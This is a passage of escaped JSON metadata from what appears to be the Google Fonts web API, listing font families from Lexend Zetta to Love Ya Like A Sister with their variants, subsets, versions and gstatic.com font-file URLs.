\"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCyzHB0z5jbs8qbts.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCy1bB0z5jbs8qbts.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCy3_B0z5jbs8qbts.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Libre Barcode 128\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/librebarcode128/v26/cIfnMbdUsUoiW3O_hVviCwVjuLtXeJ_A_gMk0izH.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Libre Barcode 128 Text\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/librebarcode128text/v26/fdNv9tubt3ZEnz1Gu3I4-zppwZ9CWZ16Z0w5cV3Y6M90w4k.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Libre Barcode 39\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/librebarcode39/v19/-nFnOHM08vwC6h8Li1eQnP_AHzI2K_d709jy92k.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Libre Barcode 39 Extended\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/librebarcode39extended/v25/8At7Gt6_O5yNS0-K4Nf5U922qSzhJ3dUdfJpwNUgfNRCOZ1GOBw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Libre Barcode 39 Extended Text\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/librebarcode39extendedtext/v25/eLG1P_rwIgOiDA7yrs9LoKaYRVLQ1YldrrOnnL7xPO4jNP68fLIiPopNNA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Libre Barcode 39 Text\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/librebarcode39text/v26/sJoa3KhViNKANw_E3LwoDXvs5Un0HQ1vT-031RRL-9rYaw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Libre Barcode EAN13 Text\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-04-26\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/librebarcodeean13text/v19/wlpigxXFDU1_oCu9nfZytgIqSG0XRcJm_OQiB96PAGEki52WfA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Libre Baskerville\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/librebaskerville/v14/kmKnZrc3Hgbbcjq75U4uslyuy4kn0pNeYRI4CN2V.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/librebaskerville/v14/kmKhZrc3Hgbbcjq75U4uslyuy4kn0qNcaxYaDc2V2ro.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/librebaskerville/v14/kmKiZrc3Hgbbcjq75U4uslyuy4kn0qviTjYwI8Gcw6Oi.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Libre Bodoni\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/librebodoni/v3/_Xm--H45qDWDYULr5OfyZudXzSBgY2oMBGte6I1fwWzZcOb3U3s.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/librebodoni/v3/_Xm--H45qDWDYULr5OfyZudXzSBgY2oMBGte6L9fwWzZcOb3U3s.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/librebodoni/v3/_Xm--H45qDWDYULr5OfyZudXzSBgY2oMBGte6FNYwWzZcOb3U3s.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/librebodoni/v3/_Xm--H45qDWDYULr5OfyZudXzSBgY2oMBGte6GpYwWzZcOb3U3s.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/librebodoni/v3/_Xm4-H45qDWDYULr5OfyZud9xBKfuwNnnsVZ_UUcKS_TdMTyQ3syLg.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/librebodoni/v3/_Xm4-H45qDWDYULr5OfyZud9xBKfuwNnnsVZ_UUcGy_TdMTyQ3syLg.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/librebodoni/v3/_Xm4-H45qDWDYULr5OfyZud9xBKfuwNnnsVZ_UUc9yjTdMTyQ3syLg.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/librebodoni/v3/_Xm4-H45qDWDYULr5OfyZud9xBKfuwNnnsVZ_UUczijTdMTyQ3syLg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Libre Caslon Display\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/librecaslondisplay/v14/TuGOUUFxWphYQ6YI6q9Xp61FQzxDRKmzr2lRdRhtCC4d.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Libre Caslon Text\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/librecaslontext/v3/DdT878IGsGw1aF1JU10PUbTvNNaDMcq_3eNrHgO1.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/librecaslontext/v3/DdT678IGsGw1aF1JU10PUbTvNNaDMfq91-dJGxO1q9o.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/librecaslontext/v3/DdT578IGsGw1aF1JU10PUbTvNNaDMfID8sdjNR-8ssPt.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Libre Franklin\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhLsSUB9rIb-JH1g.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhrsWUB9rIb-JH1g.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhcMWUB9rIb-JH1g.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhLsWUB9rIb-JH1g.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhHMWUB9rIb-JH1g.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduh8MKUB9rIb-JH1g.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhycKUB9rIb-JH1g.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhrsKUB9rIb-JH1g.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhh8KUB9rIb-JH1g.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oZ8RdDMTedX1sGE.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05ob8RNDMTedX1sGE.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oYiRNDMTedX1sGE.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oZ8RNDMTedX1sGE.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oZORNDMTedX1sGE.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oaiQ9DMTedX1sGE.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oabQ9DMTedX1sGE.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05ob8Q9DMTedX1sGE.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05obVQ9DMTedX1sGE.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Licorice\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/licorice/v3/t5tjIR8TMomTCAyjNk23hqLgzCHu.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Life Savers\",\n      \"variants\": [\n        \"regular\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lifesavers/v18/ZXuie1UftKKabUQMgxAal_lrFgpbuNvB.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/lifesavers/v18/ZXu_e1UftKKabUQMgxAal8HXOS5Tk8fIpPRW.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/lifesavers/v18/ZXu_e1UftKKabUQMgxAal8HLOi5Tk8fIpPRW.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lilita One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lilitaone/v13/i7dPIFZ9Zz-WBtRtedDbUEZ2RFq7AwU.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lily Script One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lilyscriptone/v15/LhW9MV7ZMfIPdMxeBjBvFN8SXLS4gsSjQNsRMg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Limelight\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/limelight/v16/XLYkIZL7aopJVbZJHDuYPeNGrnY2TA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Linden Hill\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lindenhill/v22/-F61fjxoKSg9Yc3hZgO8ygFI7CwC009k.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/lindenhill/v22/-F63fjxoKSg9Yc3hZgO8yjFK5igg1l9kn-s.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Literata\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v30\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/literata/v30/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbJG_F_bcTWCWp8g.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/literata/v30/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbE-_F_bcTWCWp8g.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/literata/v30/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbBG_F_bcTWCWp8g.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/literata/v30/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbCO_F_bcTWCWp8g.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/literata/v30/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbM-4F_bcTWCWp8g.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/literata/v30/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbPa4F_bcTWCWp8g.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/literata/v30/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbJG4F_bcTWCWp8g.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/literata/v30/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbLi4F_bcTWCWp8g.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/literata/v30/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8f7XWSUKTt8iVow.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/literata/v30/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8obXWSUKTt8iVow.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/literata/v30/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8_7XWSUKTt8iVow.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/literata/v30/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8zbXWSUKTt8iVow.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/literata/v30/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8IbLWSUKTt8iVow.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/literata/v30/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8GLLWSUKTt8iVow.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/literata/v30/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8f7LWSUKTt8iVow.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/literata/v30/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8VrLWSUKTt8iVow.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Liu Jian Mao Cao\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"chinese-simplified\",\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/liujianmaocao/v15/~ChIKEExpdSBKaWFuIE1hbyBDYW8gACoECAEYAQ==.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Livvic\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/livvic/v13/rnCr-x1S2hzjrlffC-M-mHnOSOuk.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/livvic/v13/rnCt-x1S2hzjrlfXbdtakn3sTfukQHs.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/livvic/v13/rnCq-x1S2hzjrlffp8IeslfCQfK9WQ.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/livvic/v13/rnCs-x1S2hzjrlfXbdv2s13GY_etWWIJ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/livvic/v13/rnCq-x1S2hzjrlffw8EeslfCQfK9WQ.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/livvic/v13/rnCs-x1S2hzjrlfXbduSsF3GY_etWWIJ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/livvic/v13/rnCp-x1S2hzjrlfnb-k6unzeSA.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/livvic/v13/rnCr-x1S2hzjrlfXbeM-mHnOSOuk.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/livvic/v13/rnCq-x1S2hzjrlffm8AeslfCQfK9WQ.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/livvic/v13/rnCs-x1S2hzjrlfXbdvKsV3GY_etWWIJ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/livvic/v13/rnCq-x1S2hzjrlfft8ceslfCQfK9WQ.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/livvic/v13/rnCs-x1S2hzjrlfXbdvmtl3GY_etWWIJ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/livvic/v13/rnCq-x1S2hzjrlff08YeslfCQfK9WQ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/livvic/v13/rnCs-x1S2hzjrlfXbduCt13GY_etWWIJ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/livvic/v13/rnCq-x1S2hzjrlff68QeslfCQfK9WQ.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/livvic/v13/rnCs-x1S2hzjrlfXbdu6tV3GY_etWWIJ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lobster\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v28\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lobster/v28/neILzCirqoswsqX9_oWsMqEzSJQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lobster Two\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lobstertwo/v18/BngMUXZGTXPUvIoyV6yN59fK7KSJ4ACD.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/lobstertwo/v18/BngOUXZGTXPUvIoyV6yN5-fI5qCr5RCDY_k.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/lobstertwo/v18/BngRUXZGTXPUvIoyV6yN5-92w4CByxyKeuDp.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/lobstertwo/v18/BngTUXZGTXPUvIoyV6yN5-fI3hyEwRiof_DpXMY.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Londrina Outline\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/londrinaoutline/v23/C8c44dM8vmb14dfsZxhetg3pDH-SfuoxrSKMDvI.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Londrina Shadow\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/londrinashadow/v22/oPWX_kB4kOQoWNJmjxLV5JuoCUlXRlaSxkrMCQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Londrina Sketch\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/londrinasketch/v21/c4m41npxGMTnomOHtRU68eIJn8qfWWn5Pos6CA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Londrina Solid\",\n      \"variants\": [\n        \"100\",\n        \"300\",\n        \"regular\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/londrinasolid/v15/flUjRq6sw40kQEJxWNgkLuudGfs9KBYesZHhV64.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/londrinasolid/v15/flUiRq6sw40kQEJxWNgkLuudGfv1CjY0n53oTrcL.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/londrinasolid/v15/flUhRq6sw40kQEJxWNgkLuudGcNZIhI8tIHh.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/londrinasolid/v15/flUiRq6sw40kQEJxWNgkLuudGfvdDzY0n53oTrcL.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Long Cang\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"chinese-simplified\",\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/longcang/v17/LYjAdGP8kkgoTec8zkRgrXArXN7HWQ.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lora\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lora/v26/0QI6MX1D_JOuGQbT0gvTJPa787weuyJGmKxemMeZ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/lora/v26/0QI6MX1D_JOuGQbT0gvTJPa787wsuyJGmKxemMeZ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/lora/v26/0QI6MX1D_JOuGQbT0gvTJPa787zAvCJGmKxemMeZ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/lora/v26/0QI6MX1D_JOuGQbT0gvTJPa787z5vCJGmKxemMeZ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/lora/v26/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-MoFkqh8ndeZzZ0.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/lora/v26/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-PgFkqh8ndeZzZ0.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/lora/v26/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-BQCkqh8ndeZzZ0.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/lora/v26/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-C0Ckqh8ndeZzZ0.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Love Light\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lovelight/v3/t5tlIR0TNJyZWimpNAXDjKbCyTHuspo.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Love Ya Like A Sister\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": 